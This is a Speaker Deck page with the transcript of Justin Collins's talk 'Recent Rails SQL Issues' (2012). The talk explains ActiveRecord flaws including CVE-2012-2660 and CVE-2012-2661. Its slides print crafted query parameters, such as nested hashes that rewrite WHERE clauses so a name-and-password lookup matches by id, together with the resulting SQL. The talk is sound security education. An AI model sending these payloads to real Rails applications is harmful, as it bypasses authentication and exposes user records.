Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Sponsored
·
Your Podcast. Everywhere. Effortlessly.
Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
→
Justin Collins
April 23, 2015
Programming
88
0
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
170
The Evolution of Rails Security
presidentbeef
1
890
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
170
Practical Static Analysis for Continuous Application Security
presidentbeef
0
260
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
500
Continuous Security with Practical Static Analysis
presidentbeef
1
370
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
300
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.3k
Tales from the Crypt
presidentbeef
1
280
Other Decks in Programming
See All in Programming
アルゴリズムは何を圧縮しているのか ─ Haskell から育った「圧縮代数」というメンタルモデル
naoya
15
3.2k
その問い、本当に正しいですか?AI時代のエンジニアに必要な哲学と認知科学 / ai-philosophy-cognitive-science
minodriven
14
6.8k
トークンをケチるな、設計しろ:GitHub Copilotを賢く使うコンテキスト戦略
ochtum
0
300
SREの積み重ねがAI駆動開発のガードレールになった ― 7つの実践/SRE Guardrails The 7
tomoyakitaura
8
3.6k
Embedded SREと共に達成した会員管理システムのAWS移行 - SRE NEXT 2026 ランチスポンサーセッション
niftycorp
PRO
0
2.1k
これからAgentCoreを触る方へトレンドはGatewayです
har1101
6
480
継続モナドとリアクティブプログラミング
yukikurage
3
470
鹿野さんに聞く!『TypeScriptコードレシピ集』で磨く実践力
tonkotsuboy_com
4
1k
Hatena Engineer Seminar #37「言語モデルの活用に関する研究」
slashnephy
0
500
どこまでゆるくて許されるのか
tk3fftk
0
460
SREは、MCPとSRE Agentをこう使え!
kazumax55
0
150
Performance Engineering for Everyone
elenatanasoiu
0
260
Featured
See All Featured
Building Better People: How to give real-time feedback that sticks.
wjessup
370
20k
How to make the Groovebox
asonas
2
2.3k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
194
17k
Automating Front-end Workflow
addyosmani
1370
210k
Ten Tips & Tricks for a 🌱 transition
stuffmc
0
150
A designer walks into a library…
pauljervisheath
211
24k
Scaling GitHub
holman
464
140k
The Anti-SEO Checklist Checklist. Pubcon Cyber Week
ryanjones
0
180
What's in a price? How to price your products and services
michaelherold
247
13k
Lightning Talk: Beautiful Slides for Beginners
inesmontani
PRO
2
600
Max Prin - Stacking Signals: How International SEO Comes Together (And Falls Apart)
techseoconnect
PRO
0
200
Designing Experiences People Love
moore
143
24k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1